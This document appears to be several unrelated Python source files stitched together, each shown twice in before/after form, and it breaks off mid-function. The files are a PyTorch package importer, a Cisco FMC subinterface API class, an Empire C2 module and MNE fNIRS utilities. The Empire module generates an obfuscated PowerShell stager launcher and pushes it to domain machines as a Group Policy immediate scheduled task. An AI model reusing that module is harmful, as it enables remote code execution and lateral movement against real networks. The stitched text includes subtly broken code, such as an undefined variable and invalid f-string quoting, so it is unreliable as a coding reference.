parent_module = self.modules[parent]
try:
path = parent_module.__path__ # type: ignore[attr-defined]
except AttributeError:
msg = (_ERR_MSG + "; {!r} is not a package").format(name, parent)
raise ModuleNotFoundError(msg, name=name) from None
module = self._load_module(name, parent)
self._install_on_parent(parent, name, module)
return module
# note: copied from cpython's import code
def _find_and_load(self, name):
module = self.modules.get(name, _NEEDS_LOADING)
if module is _NEEDS_LOADING:
return self._do_find_and_load(name)
if module is None:
message = "import of {} halted; " "None in sys.modules".format(name)
raise ModuleNotFoundError(message, name=name)
# To handle https://github.com/pytorch/pytorch/issues/57490, where std's
# creation of fake submodules via the hacking of sys.modules is not import
# friendly
if name == "os":
self.modules["os.path"] = cast(Any, module).path
elif name == "typing":
self.modules["typing.io"] = cast(Any, module).io
self.modules["typing.re"] = cast(Any, module).re
return module
def _gcd_import(self, name, package=None, level=0):
"""Import and return the module based on its name, the package the call is
being made from, and the level adjustment.
This function represents the greatest common denominator of functionality
between import_module and __import__. This includes setting __package__ if
the loader did not.
"""
_sanity_check(name, package, level)
if level > 0:
name = _resolve_name(name, package, level)
return self._find_and_load(name)
# note: copied from cpython's import code
def _handle_fromlist(self, module, fromlist, *, recursive=False):
"""Figure out what __import__ should return.
The import_ parameter is a callable which takes the name of module to
import. It is required to decouple the function from assuming importlib's
import implementation is desired.
"""
module_name = demangle(module.__name__)
# The hell that is fromlist ...
# If a package was imported, try to import stuff from fromlist.
if hasattr(module, "__path__"):
for x in fromlist:
if not isinstance(x, str):
if recursive:
where = module_name + ".__all__"
else:
where = "``from list''"
raise TypeError(
f"Item in {where} must be str, " f"not {type(x).__name__}"
)
elif x == "*":
if not recursive and hasattr(module, "__all__"):
self._handle_fromlist(module, module.__all__, recursive=True)
elif not hasattr(module, x):
from_name = "{}.{}".format(module_name, x)
try:
self._gcd_import(from_name)
except ModuleNotFoundError as exc:
# Backwards-compatibility dictates we ignore failed
# imports triggered by fromlist for modules that don't
# exist.
if (
exc.name == from_name
and self.modules.get(from_name, _NEEDS_LOADING) is not None
):
continue
raise
return module
def __import__(self, name, globals=None, locals=None, fromlist=(), level=0):
if level == 0:
module = self._gcd_import(name)
else:
globals_ = globals if globals is not None else {}
package = _calc___package__(globals_)
module = self._gcd_import(name, package, level)
if not fromlist:
# Return up to the first dot in 'name'. This is complicated by the fact
# that 'name' may be relative.
if level == 0:
return self._gcd_import(name.partition(".")[0])
elif not name:
return module
else:
# Figure out where to slice the module's name up to the first dot
# in 'name'.
cut_off = len(name) - len(name.partition(".")[0])
# Slice end needs to be positive to alleviate need to special-case
# when ``'.' not in name``.
module_name = demangle(module.__name__)
return self.modules[module_name[: len(module_name) - cut_off]]
else:
return self._handle_fromlist(module, fromlist)
def _get_package(self, package):
"""Take a package name or module object and return the module.
If a name, the module is imported. If the passed or imported module
object is not a package, raise an exception.
"""
if hasattr(package, "__spec__"):
if package.__spec__.submodule_search_locations is None:
raise TypeError("{!r} is not a package".format(package.__spec__.name))
else:
return package
else:
module = self.import_module(package)
if module.__spec__.submodule_search_locations is None:
raise TypeError("{!r} is not a package".format(package))
else:
return module
def _zipfile_path(self, package, resource=None):
package = self._get_package(package)
assert package.__loader__ is self
name = demangle(package.__name__)
if resource is not None:
resource = _normalize_path(resource)
return f"{name.replace('.', '/')}/{resource}"
else:
return f"{name.replace('.', '/')}"
def _get_or_create_package(
self, atoms: List[str]
) -> "Union[_PackageNode, _ExternNode]":
cur = self.root
for i, atom in enumerate(atoms):
node = cur.children.get(atom, None)
if node is None:
node = cur.children[atom] = _PackageNode(None)
if isinstance(node, _ExternNode):
return node
if isinstance(node, _ModuleNode):
name = ".".join(atoms[:i])
raise ImportError(
f"inconsistent module structure. module {name} is not a package, but has submodules"
)
assert isinstance(node, _PackageNode)
cur = node
return cur
def _add_file(self, filename: str):
"""Assembles a Python module out of the given file. Will ignore files in the .data directory.
Args:
filename (str): the name of the file inside of the package archive to be added
"""
*prefix, last = filename.split("/")
if len(prefix) > 1 and prefix[0] == ".data":
return
package = self._get_or_create_package(prefix)
if isinstance(package, _ExternNode):
raise ImportError(
f"inconsistent module structure. package contains a module file {filename}"
f" that is a subpackage of a module marked external."
)
if last == "__init__.py":
package.source_file = filename
elif last.endswith(".py"):
package_name = last[: -len(".py")]
package.children[package_name] = _ModuleNode(filename)
def _add_extern(self, extern_name: str):
*prefix, last = extern_name.split(".")
package = self._get_or_create_package(prefix)
if isinstance(package, _ExternNode):
return # the shorter extern covers this extern case
package.children[last] = _ExternNode()
_NEEDS_LOADING = object()
_ERR_MSG_PREFIX = "No module named "
_ERR_MSG = _ERR_MSG_PREFIX + "{!r}"
class _PathNode:
pass
class _PackageNode(_PathNode):
def __init__(self, source_file: Optional[str]):
self.source_file = source_file
self.children: Dict[str, _PathNode] = {}
class _ModuleNode(_PathNode):
__slots__ = ["source_file"]
def __init__(self, source_file: str):
self.source_file = source_file
class _ExternNode(_PathNode):
pass
# A private global registry of all modules that have been package-imported.
_package_imported_modules: WeakValueDictionary = WeakValueDictionary()
# `inspect` by default only looks in `sys.modules` to find source files for classes.
# Patch it to check our private registry of package-imported modules as well.
_orig_getfile = inspect.getfile
def patched_getfile(object):
if inspect.isclass(object):
if object.__module__ in _package_imported_modules:
return _package_imported_modules[object.__module__].__file__
return _orig_getfile(object)
inspect.getfile = patched_getfile
class _PackageResourceReader:
"""Private class used to support PackageImporter.get_resource_reader().
Confirms to the importlib.abc.ResourceReader interface. Allowed to access
the innards of PackageImporter.
"""
def __init__(self, importer, fullname):
self.importer = importer
self.fullname = fullname
def open_resource(self, resource):
from io import BytesIO
return BytesIO(self.importer.load_binary(self.fullname, resource))
def resource_path(self, resource):
# The contract for resource_path is that it either returns a concrete
# file system path or raises FileNotFoundError.
if isinstance(
self.importer.zip_reader, DirectoryReader
) and self.importer.zip_reader.has_record(
os.path.join(self.fullname, resource)
):
return os.path.join(
self.importer.zip_reader.directory, self.fullname, resource
)
raise FileNotFoundError
def is_resource(self, name):
path = self.importer._zipfile_path(self.fullname, name)
return self.importer.zip_reader.has_record(path)
def contents(self):
from pathlib import Path
filename = self.fullname.replace(".", "/")
fullname_path = Path(self.importer._zipfile_path(self.fullname))
files = self.importer.zip_reader.get_all_records()
subdirs_seen = set()
for filename in files:
try:
relative = Path(filename).relative_to(fullname_path)
except ValueError:
continue
# If the path of the file (which is relative to the top of the zip
# namespace), relative to the package given when the resource
# reader was created, has a parent, then it's a name in a
# subdirectory and thus we skip it.
parent_name = relative.parent.name
if len(parent_name) == 0:
yield relative.name
elif parent_name not in subdirs_seen:
subdirs_seen.add(parent_name)
yield parent_name
|
"""Sub-interfaces Classes."""
from fmcapi.api_objects.apiclasstemplate import APIClassTemplate
from fmcapi.api_objects.device_services.devicerecords import DeviceRecords
from fmcapi.api_objects.object_services.securityzones import SecurityZones
from fmcapi.api_objects.device_services.physicalinterfaces import PhysicalInterfaces
import logging
class SubInterfaces(APIClassTemplate):
"""The Subinterface Object in the FMC."""
VALID_JSON_DATA = [
"id",
"name",
"type",
"mode",
"enabled",
"MTU",
"managementOnly",
"ipAddress",
"subIntfId",
"vlanId",
"macLearn",
"ifname",
"securityZone",
"arpConfig",
"ipv4",
"ipv6",
"macTable",
"enableAntiSpoofing",
"fragmentReassembly",
"enableDNSLookup",
"activeMACAddress",
"standbyMACAddress",
]
VALID_FOR_KWARGS = VALID_JSON_DATA + ["device_name"]
VALID_CHARACTERS_FOR_NAME = """[.\w\d_\-\/\. ]"""
PREFIX_URL = "/devices/devicerecords"
URL_SUFFIX = None
REQUIRED_FOR_POST = ["name", "subIntfId", "MTU"]
REQUIRED_FOR_PUT = ["id", "device_id"]
VALID_FOR_IPV4 = ["static", "dhcp", "pppoe"]
VALID_FOR_MODE = ["INLINE", "PASSIVE", "TAP", "ERSPAN", "NONE"]
VALID_FOR_MTU = range(64, 9000)
def __init__(self, fmc, **kwargs):
"""
Initialize SubInterfaces object.
Set self.type to "SubInterface" and parse the kwargs.
:param fmc (object): FMC object
:param **kwargs: Any other values passed during instantiation.
:return: None
"""
super().__init__(fmc, **kwargs)
logging.debug("In __init__() for SubInterfaces class.")
self.parse_kwargs(**kwargs)
self.type = "SubInterface"
def parse_kwargs(self, **kwargs):
"""
Parse the kwargs and set self variables to match.
:return: None
"""
super().parse_kwargs(**kwargs)
logging.debug("In parse_kwargs() for SubInterfaces class.")
if "device_name" in kwargs:
self.device(device_name=kwargs["device_name"])
if "ipv4" in kwargs:
if list(kwargs["ipv4"].keys())[0] in self.VALID_FOR_IPV4:
self.ipv4 = kwargs["ipv4"]
else:
logging.warning(
f"""Method "{kwargs["ipv4"]}" is not a valid ipv4 type."""
)
if "mode" in kwargs:
if kwargs["mode"] in self.VALID_FOR_MODE:
self.mode = kwargs["mode"]
else:
logging.warning(f"""Mode "{kwargs["mode"]}" is not a valid mode.""")
if "MTU" in kwargs:
if kwargs["MTU"] in self.VALID_FOR_MTU:
self.MTU = kwargs["MTU"]
else:
logging.warning(
f"""MTU "{kwargs["MTU"]}" should be in the range 64-9000."""
)
self.MTU = 1500
def device(self, device_name):
"""
Associate device to this subinterface.
:param device_name: (str) Name of device.
:return: None
"""
logging.debug("In device() for SubInterfaces class.")
device1 = DeviceRecords(fmc=self.fmc)
device1.get(name=device_name)
if "id" in device1.__dict__:
self.device_id = device1.id
self.URL = f"{self.fmc.configuration_url}{self.PREFIX_URL}/{self.device_id}/subinterfaces"
self.device_added_to_url = True
else:
logging.warning(
f'Device "{device_name}" not found. Cannot set up device for SubInterfaces.'
)
def sz(self, name):
"""
Assign Security Zone to this subinterface.
:param name: (str) Name of Security Zone.
:return: None
"""
logging.debug("In sz() for SubInterfaces class.")
sz = SecurityZones(fmc=self.fmc)
sz.get(name=name)
if "id" in sz.__dict__:
new_zone = {"name": sz.name, "id": sz.id, "type": sz.type}
self.securityZone = new_zone
else:
logging.warning(
f'Security Zone, "{name}", not found. Cannot add to SubInterfaces.'
)
def static(self, ipv4addr, ipv4mask):
"""
Assign static IP to this bridge subinterface.
:param ipv4addr: (str) x.x.x.x
:param ipv4mask: (str) bitmask
:return: None
"""
logging.debug("In static() for SubInterfaces class.")
self.ipv4 = {"static": {"address": ipv4addr, "netmask": ipv4mask}}
def dhcp(self, enableDefault=True, routeMetric=1):
"""
Configure this subinterface with DHCP for addressing.
:param enableDefault: (bool) Accept, or not, a default route via DHCP.
:param routeMetric: (int) Set route metric.
:return: None
"""
logging.debug("In dhcp() for SubInterfaces class.")
self.ipv4 = {
"dhcp": {
"enableDefaultRouteDHCP": enableDefault,
"dhcpRouteMetric": routeMetric,
}
}
def p_interface(self, p_interface, device_name):
"""
Define which physical interface on which device is a part of this subinterface.
:param p_interfaces: (str) Name of physical interface.
:param device_name: (str) Name of device with that interface.
:return: None
"""
logging.debug("In p_interface() for SubInterfaces class.")
intf1 = PhysicalInterfaces(fmc=self.fmc)
intf1.get(name=p_interface, device_name=device_name)
if "id" in intf1.__dict__:
self.name = intf1.name
if "MTU" not in self.__dict__:
self.MTU = intf1.MTU
else:
logging.warning(
f'PhysicalInterface, "{intf1.name}", not found. Cannot add to SubInterfaces.'
)
| """Sub-interfaces Classes."""
from fmcapi.api_objects.apiclasstemplate import APIClassTemplate
from fmcapi.api_objects.device_services.devicerecords import DeviceRecords
from fmcapi.api_objects.object_services.securityzones import SecurityZones
from fmcapi.api_objects.device_services.physicalinterfaces import PhysicalInterfaces
import logging
class SubInterfaces(APIClassTemplate):
"""The Subinterface Object in the FMC."""
VALID_JSON_DATA = [
"id",
"name",
"type",
"mode",
"enabled",
"MTU",
"managementOnly",
"ipAddress",
"subIntfId",
"vlanId",
"macLearn",
"ifname",
"securityZone",
"arpConfig",
"ipv4",
"ipv6",
"macTable",
"enableAntiSpoofing",
"fragmentReassembly",
"enableDNSLookup",
"activeMACAddress",
"standbyMACAddress",
]
VALID_FOR_KWARGS = VALID_JSON_DATA + ["device_name"]
VALID_CHARACTERS_FOR_NAME = """[.\w\d_\-\/\. ]"""
PREFIX_URL = "/devices/devicerecords"
URL_SUFFIX = None
REQUIRED_FOR_POST = ["name", "subIntfId", "MTU"]
REQUIRED_FOR_PUT = ["id", "device_id"]
VALID_FOR_IPV4 = ["static", "dhcp", "pppoe"]
VALID_FOR_MODE = ["INLINE", "PASSIVE", "TAP", "ERSPAN", "NONE"]
VALID_FOR_MTU = range(64, 9000)
def __init__(self, fmc, **kwargs):
"""
Initialize SubInterfaces object.
Set self.type to "SubInterface" and parse the kwargs.
:param fmc (object): FMC object
:param **kwargs: Any other values passed during instantiation.
:return: None
"""
super().__init__(fmc, **kwargs)
logging.debug("In __init__() for SubInterfaces class.")
self.parse_kwargs(**kwargs)
self.type = "SubInterface"
def parse_kwargs(self, **kwargs):
"""
Parse the kwargs and set self variables to match.
:return: None
"""
super().parse_kwargs(**kwargs)
logging.debug("In parse_kwargs() for SubInterfaces class.")
if "device_name" in kwargs:
self.device(device_name=kwargs["device_name"])
if "ipv4" in kwargs:
if list(kwargs["ipv4"].keys())[0] in self.VALID_FOR_IPV4:
self.ipv4 = kwargs["ipv4"]
else:
logging.warning(
f"""Method "{kwargs['ipv4']}" is not a valid ipv4 type."""
)
if "mode" in kwargs:
if kwargs["mode"] in self.VALID_FOR_MODE:
self.mode = kwargs["mode"]
else:
logging.warning(f"""Mode "{kwargs['mode']}" is not a valid mode.""")
if "MTU" in kwargs:
if kwargs["MTU"] in self.VALID_FOR_MTU:
self.MTU = kwargs["MTU"]
else:
logging.warning(
f"""MTU "{kwargs['MTU']}" should be in the range 64-9000."""
)
self.MTU = 1500
def device(self, device_name):
"""
Associate device to this subinterface.
:param device_name: (str) Name of device.
:return: None
"""
logging.debug("In device() for SubInterfaces class.")
device1 = DeviceRecords(fmc=self.fmc)
device1.get(name=device_name)
if "id" in device1.__dict__:
self.device_id = device1.id
self.URL = f"{self.fmc.configuration_url}{self.PREFIX_URL}/{self.device_id}/subinterfaces"
self.device_added_to_url = True
else:
logging.warning(
f'Device "{device_name}" not found. Cannot set up device for SubInterfaces.'
)
def sz(self, name):
"""
Assign Security Zone to this subinterface.
:param name: (str) Name of Security Zone.
:return: None
"""
logging.debug("In sz() for SubInterfaces class.")
sz = SecurityZones(fmc=self.fmc)
sz.get(name=name)
if "id" in sz.__dict__:
new_zone = {"name": sz.name, "id": sz.id, "type": sz.type}
self.securityZone = new_zone
else:
logging.warning(
f'Security Zone, "{name}", not found. Cannot add to SubInterfaces.'
)
def static(self, ipv4addr, ipv4mask):
"""
Assign static IP to this bridge subinterface.
:param ipv4addr: (str) x.x.x.x
:param ipv4mask: (str) bitmask
:return: None
"""
logging.debug("In static() for SubInterfaces class.")
self.ipv4 = {"static": {"address": ipv4addr, "netmask": ipv4mask}}
def dhcp(self, enableDefault=True, routeMetric=1):
"""
Configure this subinterface with DHCP for addressing.
:param enableDefault: (bool) Accept, or not, a default route via DHCP.
:param routeMetric: (int) Set route metric.
:return: None
"""
logging.debug("In dhcp() for SubInterfaces class.")
self.ipv4 = {
"dhcp": {
"enableDefaultRouteDHCP": enableDefault,
"dhcpRouteMetric": routeMetric,
}
}
def p_interface(self, p_interface, device_name):
"""
Define which physical interface on which device is a part of this subinterface.
:param p_interfaces: (str) Name of physical interface.
:param device_name: (str) Name of device with that interface.
:return: None
"""
logging.debug("In p_interface() for SubInterfaces class.")
intf1 = PhysicalInterfaces(fmc=self.fmc)
intf1.get(name=p_interface, device_name=device_name)
if "id" in intf1.__dict__:
self.name = intf1.name
if "MTU" not in self.__dict__:
self.MTU = intf1.MTU
else:
logging.warning(
f'PhysicalInterface, "{intf1.name}", not found. Cannot add to SubInterfaces.'
)
|
from __future__ import print_function
import pathlib
from builtins import object
from builtins import str
from typing import Dict
from empire.server.common import helpers
from empire.server.common.module_models import PydanticModule
from empire.server.utils import data_util
from empire.server.utils.module_util import handle_error_message
class Module(object):
@staticmethod
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# Set booleans to false by default
obfuscate = False
module_name = 'New-GPOImmediateTask'
listener_name = params['Listener']
user_agent = params['UserAgent']
proxy = params['Proxy']
proxy_creds = params['ProxyCreds']
if (params['Obfuscate']).lower() == 'true':
obfuscate = True
ObfuscateCommand = params['ObfuscateCommand']
if not main_menu.listeners.is_listener_valid(listener_name):
# not a valid listener, return nothing for the script
return handle_error_message("[!] Invalid listener: " + listener_name)
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = main_menu.stagers.generate_launcher(listener_name, language='powershell', encode=True,
obfuscate=obfuscate, obfuscationCommand=ObfuscateCommand,
userAgent=user_agent, proxy=proxy, proxyCreds=proxy_creds,
bypasses=params['Bypasses'])
command = "/c \"" + launcher + "\""
if command == "":
return handle_error_message("[!] Error processing command")
else:
# read in the common powerview.ps1 module source code
module_source = main_menu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file():
script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code,
obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
# get just the code needed for the specified function
script = helpers.generate_dynamic_powershell_script(module_code, module_name)
script = module_name + " -Command cmd -CommandArguments '" + command + "' -Force"
for option, values in params.items():
if option.lower() in ["taskname", "taskdescription", "taskauthor", "gponame", "gpodisplayname",
"domain", "domaincontroller"]:
if values and values != '':
if values.lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " '" + str(values) + "'"
outputf = params.get("OutputFunction", "Out-String")
script += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str(module.name.split("/")[-1]) + ' completed!"'
if main_menu.obfuscate:
script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
| from __future__ import print_function
import pathlib
from builtins import object
from builtins import str
from typing import Dict
from empire.server.common import helpers
from empire.server.common.module_models import PydanticModule
from empire.server.utils import data_util
from empire.server.utils.module_util import handle_error_message
class Module(object):
@staticmethod
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# Set booleans to false by default
obfuscate = False
module_name = 'New-GPOImmediateTask'
listener_name = params['Listener']
user_agent = params['UserAgent']
proxy = params['Proxy']
proxy_creds = params['ProxyCreds']
if (params['Obfuscate']).lower() == 'true':
obfuscate = True
ObfuscateCommand = params['ObfuscateCommand']
if not main_menu.listeners.is_listener_valid(listener_name):
# not a valid listener, return nothing for the script
return handle_error_message("[!] Invalid listener: " + listener_name)
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = main_menu.stagers.generate_launcher(listener_name, language='powershell', encode=True,
obfuscate=obfuscate, obfuscationCommand=ObfuscateCommand,
userAgent=user_agent, proxy=proxy, proxyCreds=proxy_creds,
bypasses=params['Bypasses'])
command = "/c \"" + launcher + "\""
if command == "":
return handle_error_message("[!] Error processing command")
else:
# read in the common powerview.ps1 module source code
module_source = main_menu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file():
script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code,
obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
# get just the code needed for the specified function
script = helpers.generate_dynamic_powershell_script(module_code, module_name)
script = module_name + " -Command cmd -CommandArguments '" + command + "' -Force"
for option, values in params.items():
if option.lower() in ["taskname", "taskdescription", "taskauthor", "gponame", "gpodisplayname",
"domain", "domaincontroller"]:
if values and values != '':
if values.lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " '" + str(values) + "'"
outputf = params.get("OutputFunction", "Out-String")
script += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str(module.name.split("/")[-1]) + ' completed!"'
if main_menu.obfuscate:
script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
|
# Authors: Robert Luke <mail@robertluke.net>
# Eric Larson <larson.eric.d@gmail.com>
# Alexandre Gramfort <alexandre.gramfort@inria.fr>
#
# License: BSD-3-Clause
import re
import numpy as np
from ...io.pick import _picks_to_idx
from ...utils import fill_doc
# Standardized fNIRS channel name regexs
_S_D_F_RE = re.compile(r'S(\d+)_D(\d+) (\d+\.?\d*)')
_S_D_H_RE = re.compile(r'S(\d+)_D(\d+) (\w+)')
@fill_doc
def source_detector_distances(info, picks=None):
r"""Determine the distance between NIRS source and detectors.
Parameters
----------
%(info_not_none)s
%(picks_all)s
Returns
-------
dists : array of float
Array containing distances in meters.
Of shape equal to number of channels, or shape of picks if supplied.
"""
dist = [np.linalg.norm(ch['loc'][3:6] - ch['loc'][6:9])
for ch in info['chs']]
picks = _picks_to_idx(info, picks, exclude=[])
return np.array(dist, float)[picks]
@fill_doc
def short_channels(info, threshold=0.01):
r"""Determine which NIRS channels are short.
Channels with a source to detector distance of less than
``threshold`` are reported as short. The default threshold is 0.01 m.
Parameters
----------
%(info_not_none)s
threshold : float
The threshold distance for what is considered short in meters.
Returns
-------
short : array of bool
Array indicating which channels are short.
Of shape equal to number of channels.
"""
return source_detector_distances(info) < threshold
def _channel_frequencies(info, nominal=False):
"""Return the light frequency for each channel."""
# Only valid for fNIRS data before conversion to haemoglobin
picks = _picks_to_idx(info, ['fnirs_cw_amplitude', 'fnirs_od'],
exclude=[], allow_empty=True)
freqs = np.empty(picks.size, int)
for ii in picks:
if nominal:
freq = float(_S_D_F_RE.match(info['ch_names'][ii]).groups()[2])
else:
freq = info['chs'][ii]['loc'][9]
freqs[ii] = freq
return freqs
def _channel_chromophore(info):
"""Return the chromophore of each channel."""
# Only valid for fNIRS data after conversion to haemoglobin
picks = _picks_to_idx(info, ['hbo', 'hbr'], exclude=[], allow_empty=True)
chroma = []
for ii in picks:
chroma.append(info['ch_names'][ii].split(" ")[1])
return chroma
def _check_channels_ordered(info, pair_vals):
"""Check channels follow expected fNIRS format."""
# Every second channel should be same SD pair
# and have the specified light frequencies.
# All wavelength based fNIRS data.
picks_wave = _picks_to_idx(info, ['fnirs_cw_amplitude', 'fnirs_od'],
exclude=[], allow_empty=True)
# All chromophore fNIRS data
picks_chroma = _picks_to_idx(info, ['hbo', 'hbr'],
exclude=[], allow_empty=True)
# All continuous wave fNIRS data
picks_cw = np.hstack([picks_chroma, picks_wave])
if (len(picks_wave) > 0) & (len(picks_chroma) > 0):
raise ValueError(
'MNE does not support a combination of amplitude, optical '
'density, and haemoglobin data in the same raw structure.')
if len(picks_cw) % 2 != 0:
raise ValueError(
'NIRS channels not ordered correctly. An even number of NIRS '
f'channels is required. {len(info.ch_names)} channels were'
f'provided: {info.ch_names}')
# Ensure wavelength info exists for waveform data
all_freqs = [info["chs"][ii]["loc"][9] for ii in picks_wave]
if np.any(np.isnan(all_freqs)):
raise ValueError(
'NIRS channels is missing wavelength information in the'
f'info["chs"] structure. The encoded wavelengths are {all_freqs}.')
for ii in picks_cw[::2]:
ch1_name_info = _S_D_F_RE.match(info['chs'][ii]['ch_name'])
ch2_name_info = _S_D_F_RE.match(info['chs'][ii + 1]['ch_name'])
if bool(ch2_name_info) & bool(ch1_name_info):
first_value = float(ch1_name_info.groups()[2])
second_value = float(ch2_name_info.groups()[2])
error_word = "frequencies"
else:
ch1_name_info = _S_D_H_RE.match(info['chs'][ii]['ch_name'])
ch2_name_info = _S_D_H_RE.match(info['chs'][ii + 1]['ch_name'])
if bool(ch2_name_info) & bool(ch1_name_info):
first_value = ch1_name_info.groups()[2]
second_value = ch2_name_info.groups()[2]
error_word = "chromophore"
if (first_value not in ["hbo", "hbr"] or
second_value not in ["hbo", "hbr"]):
raise ValueError(
"NIRS channels have specified naming conventions."
"Chromophore data must be labeled either hbo or hbr."
"Failing channels are "
f"{info["chs"][ii]["ch_name"]}, "
f"{info["chs"][ii + 1]["ch_name"]}")
else:
raise ValueError(
'NIRS channels have specified naming conventions.'
'The provided channel names can not be parsed.'
f'Channels are {info.ch_names}')
if (ch1_name_info.groups()[0] != ch2_name_info.groups()[0]) or \
(ch1_name_info.groups()[1] != ch2_name_info.groups()[1]) or \
(first_value != pair_vals[0]) or \
(second_value != pair_vals[1]):
raise ValueError(
'NIRS channels not ordered correctly. Channels must be ordered'
' as source detector pairs with alternating'
f' {error_word}: {pair_vals[0]} & {pair_vals[1]}')
_fnirs_check_bads(info)
return picks_cw
def _validate_nirs_info(info):
"""Apply all checks to fNIRS info. Works on all continuous wave types."""
freqs = np.unique(_channel_frequencies(info, nominal=True))
if freqs.size > 0:
picks = _check_channels_ordered(info, freqs)
else:
picks = _check_channels_ordered(info,
np.unique(_channel_chromophore(info)))
return picks
def _fnirs_check_bads(info):
"""Check consistent labeling of bads across fnirs optodes."""
# For an optode pair, if one component (light frequency or chroma) is
# marked as bad then they all should be. This function checks that all
# optodes are marked bad consistently.
picks = _picks_to_idx(info, 'fnirs', exclude=[], allow_empty=True)
for ii in picks[::2]:
want = info.ch_names[ii:ii + 2]
got = list(set(info['bads']).intersection(want))
if len(got) == 1:
raise RuntimeError(
f'NIRS bad labelling is not consistent, found {got} but '
f'needed {want}')
def _fnirs_spread_bads(info):
"""Spread bad labeling across fnirs channels."""
# For an optode pair if any component (light frequency or chroma) is marked
# as bad, then they all should be. This function will find any pairs marked
# as bad and spread the bad marking to all components of the optode pair.
picks = _picks_to_idx(info, 'fnirs', exclude=[], allow_empty=True)
new_bads = list()
for ii in picks[::2]:
bad_opto = set(info['bads']).intersection(info.ch_names[ii:ii + 2])
if len(bad_opto) > 0:
new_bads.extend(info.ch_names[ii:ii + 2])
info['bads'] = new_bads
return info
| # Authors: Robert Luke <mail@robertluke.net>
# Eric Larson <larson.eric.d@gmail.com>
# Alexandre Gramfort <alexandre.gramfort@inria.fr>
#
# License: BSD-3-Clause
import re
import numpy as np
from ...io.pick import _picks_to_idx
from ...utils import fill_doc
# Standardized fNIRS channel name regexs
_S_D_F_RE = re.compile(r'S(\d+)_D(\d+) (\d+\.?\d*)')
_S_D_H_RE = re.compile(r'S(\d+)_D(\d+) (\w+)')
@fill_doc
def source_detector_distances(info, picks=None):
r"""Determine the distance between NIRS source and detectors.
Parameters
----------
%(info_not_none)s
%(picks_all)s
Returns
-------
dists : array of float
Array containing distances in meters.
Of shape equal to number of channels, or shape of picks if supplied.
"""
dist = [np.linalg.norm(ch['loc'][3:6] - ch['loc'][6:9])
for ch in info['chs']]
picks = _picks_to_idx(info, picks, exclude=[])
return np.array(dist, float)[picks]
@fill_doc
def short_channels(info, threshold=0.01):
r"""Determine which NIRS channels are short.
Channels with a source to detector distance of less than
``threshold`` are reported as short. The default threshold is 0.01 m.
Parameters
----------
%(info_not_none)s
threshold : float
The threshold distance for what is considered short in meters.
Returns
-------
short : array of bool
Array indicating which channels are short.
Of shape equal to number of channels.
"""
return source_detector_distances(info) < threshold
def _channel_frequencies(info, nominal=False):
"""Return the light frequency for each channel."""
# Only valid for fNIRS data before conversion to haemoglobin
picks = _picks_to_idx(info, ['fnirs_cw_amplitude', 'fnirs_od'],
exclude=[], allow_empty=True)
freqs = np.empty(picks.size, int)
for ii in picks:
if nominal:
freq = float(_S_D_F_RE.match(info['ch_names'][ii]).groups()[2])
else:
freq = info['chs'][ii]['loc'][9]
freqs[ii] = freq
return freqs
def _channel_chromophore(info):
"""Return the chromophore of each channel."""
# Only valid for fNIRS data after conversion to haemoglobin
picks = _picks_to_idx(info, ['hbo', 'hbr'], exclude=[], allow_empty=True)
chroma = []
for ii in picks:
chroma.append(info['ch_names'][ii].split(" ")[1])
return chroma
def _check_channels_ordered(info, pair_vals):
"""Check channels follow expected fNIRS format."""
# Every second channel should be same SD pair
# and have the specified light frequencies.
# All wavelength based fNIRS data.
picks_wave = _picks_to_idx(info, ['fnirs_cw_amplitude', 'fnirs_od'],
exclude=[], allow_empty=True)
# All chromophore fNIRS data
picks_chroma = _picks_to_idx(info, ['hbo', 'hbr'],
exclude=[], allow_empty=True)
# All continuous wave fNIRS data
picks_cw = np.hstack([picks_chroma, picks_wave])
if (len(picks_wave) > 0) & (len(picks_chroma) > 0):
raise ValueError(
'MNE does not support a combination of amplitude, optical '
'density, and haemoglobin data in the same raw structure.')
if len(picks_cw) % 2 != 0:
raise ValueError(
'NIRS channels not ordered correctly. An even number of NIRS '
f'channels is required. {len(info.ch_names)} channels were'
f'provided: {info.ch_names}')
# Ensure wavelength info exists for waveform data
all_freqs = [info["chs"][ii]["loc"][9] for ii in picks_wave]
if np.any(np.isnan(all_freqs)):
raise ValueError(
'NIRS channels is missing wavelength information in the'
f'info["chs"] structure. The encoded wavelengths are {all_freqs}.')
for ii in picks_cw[::2]:
ch1_name_info = _S_D_F_RE.match(info['chs'][ii]['ch_name'])
ch2_name_info = _S_D_F_RE.match(info['chs'][ii + 1]['ch_name'])
if bool(ch2_name_info) & bool(ch1_name_info):
first_value = float(ch1_name_info.groups()[2])
second_value = float(ch2_name_info.groups()[2])
error_word = "frequencies"
else:
ch1_name_info = _S_D_H_RE.match(info['chs'][ii]['ch_name'])
